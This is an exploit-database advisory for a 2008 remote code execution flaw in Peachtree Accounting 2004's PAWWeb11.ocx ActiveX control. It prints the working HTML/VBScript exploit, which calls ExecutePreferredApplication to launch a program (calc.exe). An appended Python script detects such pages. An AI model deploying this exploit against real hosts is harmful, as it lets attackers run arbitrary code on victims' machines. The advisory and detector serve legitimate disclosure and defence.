Vendor: Peachtree Accounting
By: Jeremy Brown
CVSS: 9.3 HIGH
Remote Code Execution
CWE: 94
Product Name: Peachtree Accounting
Affected Version From: Peachtree Accounting 2004
Affected Version To: Peachtree Accounting 2004
Patch Exists: YES
Related CWE: N/A
CPE: 2.6.8.1
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows XP
2008

Peachtree Accounting Remote (SfS/SfI) Exploit

This exploit uses a vulnerability in the PAWWeb11.ocx ActiveX control to execute arbitrary code on the target system. The exploit is an HTML page whose VBScript instantiates the control and calls its ExecutePreferredApplication method with the path of a program to run (calc.exe in the code below). It was tested on Peachtree Accounting 2004 and Windows XP with Internet Explorer 6.

Mitigation:

The vendor has released a patch to address this vulnerability.

Exploit-DB raw data:

<!-- Jeremy Brown (0xjbrown41@gmail.com/jbrownsec.blogspot.com)
     Peachtree Accounting Remote (SfS/SfI) Exploit
     Tested on Peachtree Accounting 2004 / Windows XP / IE6
     All Peachtree software that includes PAWWeb11.ocx are assumed vulnerable -->

<html><body>

<object id=target classid=clsid:2BCEAECE-6121-4E78-816C-8CD3121361B0></object>
<script language=vbscript>


arg1="C:/WINDOWS/system32/calc.exe"
target.ExecutePreferredApplication arg1

</script>
</body></html>

# milw0rm.com [2008-09-10]
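
A detection check for pages like the one above, as an added example that is not part of the original advisory or exploit: it flags HTML that binds an object to the PAWWeb11.ocx CLSID and reports whether a script then calls ExecutePreferredApplication on it. The names `scan_html` and `ControlFinder` and the sample page are constructed for illustration, and only instantiation through a `classid` attribute is covered.

```python
import re
from html.parser import HTMLParser

# CLSID and method name are taken from the exploit listing above.
PAWWEB_CLSID = "2bceaece-6121-4e78-816c-8cd3121361b0"
METHOD = "ExecutePreferredApplication"

# Constructed sample page (not real traffic); the id and path are placeholders.
SAMPLE = """<html><body>
<OBJECT ID=ctl CLASSID="CLSID:{2BCEAECE-6121-4E78-816C-8CD3121361B0}"></OBJECT>
<script language=vbscript>
ctl.executepreferredapplication "C:/placeholder.exe"
</script></body></html>"""


class ControlFinder(HTMLParser):
    """Collect ids of <object> tags bound to the CLSID and all script text."""
    def __init__(self):
        super().__init__()
        self.object_ids, self.scripts, self.in_script = [], [], False

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        if tag == "script":
            self.in_script = True
        elif tag == "object":
            # Accept any case, an optional "clsid:" prefix and optional braces.
            classid = (attrs.get("classid") or "").lower().replace("clsid:", "")
            if classid.strip("{} ") == PAWWEB_CLSID:
                self.object_ids.append(attrs.get("id") or "")

    def handle_endtag(self, tag):
        if tag == "script":
            self.in_script = False

    def handle_data(self, data):
        if self.in_script:
            self.scripts.append(data)


def scan_html(html):
    """Return ('call', ids), ('instantiated', []) or ('clean', [])."""
    finder = ControlFinder()
    finder.feed(html)
    finder.close()
    script = "\n".join(finder.scripts)
    called = [i for i in finder.object_ids if i and re.search(
        r"\b%s\s*\.\s*%s\b" % (re.escape(i), METHOD), script, re.IGNORECASE)]
    if called:
        return "call", called
    return ("instantiated" if finder.object_ids else "clean"), []
```

A verdict of `instantiated` is worth logging on its own, since any web page that loads this control on a host without the vendor patch deserves review.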